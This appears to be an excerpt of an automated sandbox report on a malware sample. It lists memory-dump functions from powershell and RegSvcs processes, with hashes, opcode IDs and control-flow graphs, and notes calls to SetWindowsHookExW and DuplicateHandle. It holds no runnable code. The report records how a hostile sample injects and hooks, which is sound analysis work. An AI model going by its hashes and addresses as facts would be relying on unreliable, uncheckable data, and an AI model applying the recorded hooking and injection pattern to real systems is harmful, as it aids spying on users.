                                      • Instruction Fuzzy Hash: A811C212F1EB4A4BE7A9965D14602B876D2DF98220F4902FAD80DC36E7DC08AD018389
                                      Function 00007FFD9B7233B5 Relevance: .0, Instructions: 49COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1971301962.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b720000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                      • Instruction ID: a8fcfb4333438396268888b7020d32f90e061c0a06e126688c62e6f9446c93e4
                                      • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                      • Instruction Fuzzy Hash: CB01677121CB0C4FDB48EF0CE451AA5B7E0FB95364F10056DE58AC36A5DA36E982CB45
                                      Function 00007FFD9B72C0F5 Relevance: .0, Instructions: 47COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1971301962.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b720000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d63c29a814455d99018027edf16d7d0277390598ae7f69ec3edf0fbdecee0513
                                      • Instruction ID: d0e1d9014a5c2f5584274b4b26bb2d189ca9d8ac458c6196c9dd20e5165c93ef
                                      • Opcode Fuzzy Hash: d63c29a814455d99018027edf16d7d0277390598ae7f69ec3edf0fbdecee0513
                                      • Instruction Fuzzy Hash: C9015E71908A4C8FCF84EF68C859AE97BF0FF68305F0501AAD409C71A1D735E944CB80
                                      Function 00007FFD9B72C110 Relevance: .0, Instructions: 39COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1971301962.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b720000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1ba5ae00766b53d8351c6f8c6e8c8478796a4f705733d960a2720d0be6f467bc
                                      • Instruction ID: 6bf17bf242b15293e694b68229341bc04dc52467b9a8ae4eaf46763ae5af9406
                                      • Opcode Fuzzy Hash: 1ba5ae00766b53d8351c6f8c6e8c8478796a4f705733d960a2720d0be6f467bc
                                      • Instruction Fuzzy Hash: 5FF0E130914A4D9FCF44EF58C459AE97BF0FB68309F10419AA40DD3160D731E594CB81

                                      Non-executed Functions

                                      Function 00007FFD9B72DCFD Relevance: 5.2, Strings: 4, Instructions: 157COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1971301962.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b720000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: &$5O_H$:$L
                                      • API String ID: 0-483364191
                                      • Opcode ID: e7f993425997a675c548a91fb38f2fba523e72eda51f7aae4abe44555e3907df
                                      • Instruction ID: 6cfed8c03d6a2001eed74afde51915e2500feec31483834caf45492ae45df47b
                                      • Opcode Fuzzy Hash: e7f993425997a675c548a91fb38f2fba523e72eda51f7aae4abe44555e3907df
                                      • Instruction Fuzzy Hash: 60519E70A097598FEBA9DF28C8657A8B7F1EF95300F4441FAD44DD72A2CA346A81CF40
                                      Function 00007FFD9B72F403 Relevance: 5.1, Strings: 4, Instructions: 57COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.1971301962.00007FFD9B720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B720000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd9b720000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: "$8$@$L
                                      • API String ID: 0-426383896
                                      • Opcode ID: 61a6af54512cdf4d35980eb1e64af4973ab726dc6f72811c9bc21fd9c7a47bf0
                                      • Instruction ID: 409b1eac065bfafb46fd0b81383b97e96efdc49c616a56d175fc5a1bdd034cc1
                                      • Opcode Fuzzy Hash: 61a6af54512cdf4d35980eb1e64af4973ab726dc6f72811c9bc21fd9c7a47bf0
                                      • Instruction Fuzzy Hash: 43219270909759CFDB65CF14C8647A8B7B1EF8A310F0042EED48DDB2A2CA751A84CF41

                                      Execution Graph

                                      Execution Coverage:9.7%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:78
                                      Total number of Limit Nodes:2
                                      execution_graph 15925 1460b35 15926 1460b1e 15925->15926 15929 146836f 15926->15929 15934 14672bc 15926->15934 15930 14683a5 15929->15930 15931 146858c 15930->15931 15939 146a8d0 15930->15939 15944 146a8e0 15930->15944 15931->15926 15935 14672c7 15934->15935 15936 146858c 15935->15936 15937 146a8d0 2 API calls 15935->15937 15938 146a8e0 2 API calls 15935->15938 15936->15926 15937->15936 15938->15936 15940 146a901 15939->15940 15941 146a925 15940->15941 15949 146aa80 15940->15949 15953 146aa90 15940->15953 15941->15931 15945 146a901 15944->15945 15946 146a925 15945->15946 15947 146aa80 2 API calls 15945->15947 15948 146aa90 2 API calls 15945->15948 15946->15931 15947->15946 15948->15946 15950 146aa9d 15949->15950 15952 146aad6 15950->15952 15957 14690d8 15950->15957 15952->15941 15954 146aa9d 15953->15954 15955 146aad6 15954->15955 15956 14690d8 2 API calls 15954->15956 15955->15941 15956->15955 15958 14690e3 15957->15958 15960 146ab48 15958->15960 15961 146910c 15958->15961 15960->15960 15962 1469117 15961->15962 15965 146911c 15962->15965 15964 146abb7 15964->15960 15966 1469127 15965->15966 15971 146baf8 15966->15971 15968 146c138 15968->15964 15969 146a8e0 2 API calls 15969->15968 15970 146bf10 15970->15968 15970->15969 15972 146bb03 15971->15972 15973 146d31a 15972->15973 15976 146d368 15972->15976 15980 146d378 15972->15980 15973->15970 15977 146d378 15976->15977 15978 146d3c6 KiUserCallbackDispatcher 15977->15978 15979 146d3f0 15977->15979 15978->15979 15979->15973 15981 146d3bb 15980->15981 15982 146d3c6 KiUserCallbackDispatcher 15981->15982 15983 146d3f0 15981->15983 15982->15983 15983->15973 15984 1467440 15985 1467486 15984->15985 15989 1467610 15985->15989 15993 1467620 15985->15993 15986 1467573 15990 1467620 15989->15990 15996 146701c 15990->15996 15994 146701c DuplicateHandle 15993->15994 15995 146764e 15994->15995 15995->15986 15997 1467688 DuplicateHandle 15996->15997 15998 146764e 15997->15998 15998->15986 15999 1462308 16000 146234c SetWindowsHookExW 15999->16000 16002 1462392 16000->16002 16003 1462188 16007 1462197 16003->16007 16004 14621a2 16007->16004 16008 1466328 16007->16008 16012 1466338 16007->16012 16009 1466347 16008->16009 16016 1465b54 16009->16016 16013 1466347 16012->16013 16014 1465b54 2 API calls 16013->16014 16015 1466368 16014->16015 16015->16004 16017 1465b5f 16016->16017 16018 14672bc 2 API calls 16017->16018 16019 1467cee 16018->16019 16019->16019 16020 14609b8 16021 14609db 16020->16021 16022 146836f 2 API calls 16021->16022 16023 14672bc 2 API calls 16021->16023 16022->16021 16023->16021

                                      Executed Functions

                                      Function 071F0040 Relevance: 1.6, Instructions: 1574COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4143099064.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_71f0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f8684affe5959d77cbaf5feb727a5ab24f57bc553408e981c545164483cedce0
                                      • Instruction ID: 7d0411644ae8ddb2fc1d667efa56f2c7023fb1d6e568cc2dda203c79c7766e2e
                                      • Opcode Fuzzy Hash: f8684affe5959d77cbaf5feb727a5ab24f57bc553408e981c545164483cedce0
                                      • Instruction Fuzzy Hash: 07D23734710224CFCB59AB74D6A9A6E77A3EFC9208B10496DE50A9B394EF35DC42CB41
                                      Function 0146701C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 951 146701c-146771c DuplicateHandle 953 1467725-1467742 951->953 954 146771e-1467724 951->954 954->953
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0146764E,?,?,?,?,?), ref: 0146770F
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4123991776.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_1460000_RegSvcs.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 4fff48dc078bea236a7b9d364701c09e2868d20f4cf1a7f608bf76a406bbaa1d
                                      • Instruction ID: 369f3d94a5de8f20d932b37ebd6d0deafb5426ded545be599d25080f491d6841
                                      • Opcode Fuzzy Hash: 4fff48dc078bea236a7b9d364701c09e2868d20f4cf1a7f608bf76a406bbaa1d
                                      • Instruction Fuzzy Hash: 3321E6B59003089FDB10CF9AD884ADEFFF8EB48325F14841AE918A7350D379A954CFA5
                                      Function 01467680 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 957 1467680-146771c DuplicateHandle 958 1467725-1467742 957->958 959 146771e-1467724 957->959 959->958
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0146764E,?,?,?,?,?), ref: 0146770F
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4123991776.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_1460000_RegSvcs.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 244b5191d7b236d5ffc562533fbb805937866983472a5bbd87a4b74cbccaed45
                                      • Instruction ID: 33bc637e2ed749d20e2cf9190bc9676e170de437dcc09612b0ac3ec22a1c86c7
                                      • Opcode Fuzzy Hash: 244b5191d7b236d5ffc562533fbb805937866983472a5bbd87a4b74cbccaed45
                                      • Instruction Fuzzy Hash: BE21E4B5D003089FDB10CFA9D985ADEBBF8FB48314F14841AE919A7350D378AA54DFA1
                                      Function 01462301 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 962 1462301-1462352 964 1462354 962->964 965 146235e-1462390 SetWindowsHookExW 962->965 968 146235c 964->968 966 1462392-1462398 965->966 967 1462399-14623be 965->967 966->967 968->965
                                      APIs
                                      • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01462383
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4123991776.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_1460000_RegSvcs.jbxd
                                      Similarity
                                      • API ID: HookWindows
                                      • String ID:
                                      • API String ID: 2559412058-0
                                      • Opcode ID: 136458d7d62882b677dbe60f068c37e1115314e2813ec2e09fe6dbd713bfb678
                                      • Instruction ID: 473468954e1b20a1a6c21bebf8ecc1fdff7974187c4460902d0a489a5c2cfb89
                                      • Opcode Fuzzy Hash: 136458d7d62882b677dbe60f068c37e1115314e2813ec2e09fe6dbd713bfb678
                                      • Instruction Fuzzy Hash: E42133B5D002099FDB14CFA9D848BEEFBF5AF88310F14842AD459A7290C774A984CFA1
                                      Function 01462308 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 972 1462308-1462352 974 1462354 972->974 975 146235e-1462390 SetWindowsHookExW 972->975 978 146235c 974->978 976 1462392-1462398 975->976 977 1462399-14623be 975->977 976->977 978->975
                                      APIs
                                      • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01462383
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4123991776.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_1460000_RegSvcs.jbxd
                                      Similarity
                                      • API ID: HookWindows
                                      • String ID:
                                      • API String ID: 2559412058-0
                                      • Opcode ID: a69d045f976f30f6a54728975ff9596eda856a6e9ff6a89a5aacde732940dfd8
                                      • Instruction ID: 9a3ed44ce87ffc4415f7843bfb6c5f810662fabda34929d8b7646307aadfc26e
                                      • Opcode Fuzzy Hash: a69d045f976f30f6a54728975ff9596eda856a6e9ff6a89a5aacde732940dfd8
                                      • Instruction Fuzzy Hash: E52115B1D002099FDB14DFAAD844BDEFBF5EB88314F10841AD419A7250C775A944CFA1
                                      Function 0146D368 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 982 146d368-146d3c4 985 146d3c6-146d3ee KiUserCallbackDispatcher 982->985 986 146d412-146d42b 982->986 987 146d3f7-146d40b 985->987 988 146d3f0-146d3f6 985->988 987->986 988->987
                                      APIs
                                      • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0146D3DD
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4123991776.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_1460000_RegSvcs.jbxd
                                      Similarity
                                      • API ID: CallbackDispatcherUser
                                      • String ID:
                                      • API String ID: 2492992576-0
                                      • Opcode ID: 7737ff19cff09d45e3764278977437e2ac44389d5307c3557e83b6a958284ea1
                                      • Instruction ID: c7f0cd5e2665e2ae31b329b48424762bc53083310772c7c02785def144ba3f85
                                      • Opcode Fuzzy Hash: 7737ff19cff09d45e3764278977437e2ac44389d5307c3557e83b6a958284ea1
                                      • Instruction Fuzzy Hash: 6011B470810388CEEB10CF95E4453DEBFF8FB08314F10805AE989A3352D7796644CBA6
                                      Function 0146D378 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 990 146d378-146d3c4 992 146d3c6-146d3ee KiUserCallbackDispatcher 990->992 993 146d412-146d42b 990->993 994 146d3f7-146d40b 992->994 995 146d3f0-146d3f6 992->995 994->993 995->994
                                      APIs
                                      • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0146D3DD
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4123991776.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_1460000_RegSvcs.jbxd
                                      Similarity
                                      • API ID: CallbackDispatcherUser
                                      • String ID:
                                      • API String ID: 2492992576-0
                                      • Opcode ID: 2700ccc973c7d797440666b367ea66fee461da1136c2cb5b7a3a7557ec2ad732
                                      • Instruction ID: 6e397d588ad972f2c6a7fbe9d9f106cb7036369c868240e0f09903aabfa3d37e
                                      • Opcode Fuzzy Hash: 2700ccc973c7d797440666b367ea66fee461da1136c2cb5b7a3a7557ec2ad732
                                      • Instruction Fuzzy Hash: 471190B1810389CEEB10CF99D4057DEFFF8EB09314F10805AD989A3342C7796A48CBA5
                                      Function 071F1939 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1081 71f1939-71f19a6 1087 71f19ae-71f19c7 1081->1087 1089 71f19c9 1087->1089 1090 71f19d2 1087->1090 1089->1090 1091 71f19d3 1090->1091 1091->1091
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4143099064.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_71f0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Te^q
                                      • API String ID: 0-671973202
                                      • Opcode ID: 8f54001dda3ca4e88a9ba25704d78ad6bfca60408f9ffc2857816767cfe95665
                                      • Instruction ID: 2826a824e2bfb45db252149f7f12045de5b1bdca16022ea2e6748b8c161c7272
                                      • Opcode Fuzzy Hash: 8f54001dda3ca4e88a9ba25704d78ad6bfca60408f9ffc2857816767cfe95665
                                      • Instruction Fuzzy Hash: B4118B75B105149FCB04DB68CA5ABAE7BE2AF88701F214069E502EB3A1CF718D018B90
                                      Function 071F1948 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1092 71f1948-71f19a6 1098 71f19ae-71f19c7 1092->1098 1100 71f19c9 1098->1100 1101 71f19d2 1098->1101 1100->1101 1102 71f19d3 1101->1102 1102->1102
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4143099064.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_71f0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Te^q
                                      • API String ID: 0-671973202
                                      • Opcode ID: 411463d318c6248fe53dfb3bd9b79f057ee6cea0f083cbeb165597f078786b5e
                                      • Instruction ID: 4c853f23a868f1e07f9a335e74a18b477b55255b222c960f8b2a307f60730c7c
                                      • Opcode Fuzzy Hash: 411463d318c6248fe53dfb3bd9b79f057ee6cea0f083cbeb165597f078786b5e
                                      • Instruction Fuzzy Hash: 9C0180717105159FCB149B69C959BAE7BF6AF88710F210069E502EB3E0CF719D01CB91
                                      Function 071F0006 Relevance: .1, Instructions: 89COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4143099064.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_71f0000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b3db515a4667de7036fe65a9618d52086f831aded4b74a8b06d574acb83726d8
                                      • Instruction ID: 1b56db60e5630fe8e677b90e0a9803d9efa63c06f7ddc9b602b9302199adde09
                                      • Opcode Fuzzy Hash: b3db515a4667de7036fe65a9618d52086f831aded4b74a8b06d574acb83726d8
                                      • Instruction Fuzzy Hash: D0318C712093818FC72A5B74D8512AE7FF2EF8A261B1408ABD14AD7381DB34DD45C751
                                      Function 011FD3B4 Relevance: .1, Instructions: 75COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4123401061.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_11fd000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4ffed12439851eb283c6b76b5d7da4e041919cf6d91c4cba20ffd1548962fc78
                                      • Instruction ID: c6c5dda73f52da98f468dfedeba6d056b45b48775b0c744cfb10b5f634d5d74d
                                      • Opcode Fuzzy Hash: 4ffed12439851eb283c6b76b5d7da4e041919cf6d91c4cba20ffd1548962fc78
                                      • Instruction Fuzzy Hash: 442125B1504200DFDF09DF58E8C4B66BFA5FB94324F24C56DEA0A0B646C336E456CBA2
                                      Function 0120D0FC Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4123549121.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_120d000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7e0963e2e20c9800222a947009f82b03ec984964f8eb2ac447785633607f14ca
                                      • Instruction ID: 0d7939244ad4a7c687d1c04ff0d78e0ec18f484c332ba0423f87a51c396f04c4
                                      • Opcode Fuzzy Hash: 7e0963e2e20c9800222a947009f82b03ec984964f8eb2ac447785633607f14ca
                                      • Instruction Fuzzy Hash: 022125756152089FDB06DF98D9C4B26FBA5FB84324F20CA6DD90A4B283CB76D406CA61
                                      Function 011FD3AF Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4123401061.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_11fd000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                      • Instruction ID: 3049641a2b948e2ca7e8cfe90a0075fd58670f7bf8e8481656c807301d17ab5b
                                      • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                      • Instruction Fuzzy Hash: 0811AC76504280CFDB06CF54D5C4B66BF72FB84224F24C5A9D9090AA56C336E45ACBA2
                                      Function 0120D0F7 Relevance: .1, Instructions: 53COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.4123549121.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_120d000_RegSvcs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                      • Instruction ID: a3abc262cdec9ce41faddb66891860873593b86195fad08a2188021ac9258ffa
                                      • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                      • Instruction Fuzzy Hash: 1411BB75504288CFDB06CF98D9C4B15FBB2FB84224F24C6A9D9094B297C33AD44ACB61